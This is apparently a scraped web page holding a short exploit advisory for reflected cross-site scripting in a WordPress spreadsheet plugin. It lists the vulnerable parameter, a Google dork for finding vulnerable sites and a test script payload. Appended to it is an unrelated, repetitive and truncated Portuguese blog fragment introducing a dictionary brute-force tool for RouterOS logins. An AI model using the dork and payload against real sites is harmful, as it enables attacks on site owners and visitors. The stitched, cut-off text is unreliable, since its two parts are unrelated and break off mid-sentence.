Wordpress spreadsheet Plugin Cross site scripting
#********************************************************************************
# Exploit Title : Wordpress spreadsheet Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://wordpress.org
#
# Software Link : http://downloads.wordpress.org/plugin/dh...et.2.0.zip
#
# Google Dork : inurl :wp-content/plugins/dhtmlxspreadsheet
#
# Tested on: Windows 7 , Linux
-------------------------------------------------------------------
# Exploit : Cross site scripting
#
# Location : [Target]/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=[xss]
#
# Script For Test : <script>alert(1);</script>
######################
# Example:
#
#
http://www.vulnsite.com/wp-content/plugi...(1);</script>
O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. Desenvolvedores: Ramiro Caire | ramiro.caire@gmail.com | Twitter: @rcaire Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa Projeto: github.com/mkbrutusproject/mkbrutus 01 Passo Verifique a versão atual do python em seguida realiza a instalação da versão 3 root@kali:~# python –version (Exibe a versão do Python) root@kali:~# apt-get install python3 (Realiza a instalação do Python 3) 02 Passo Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da ver...
Comentários
Postar um comentário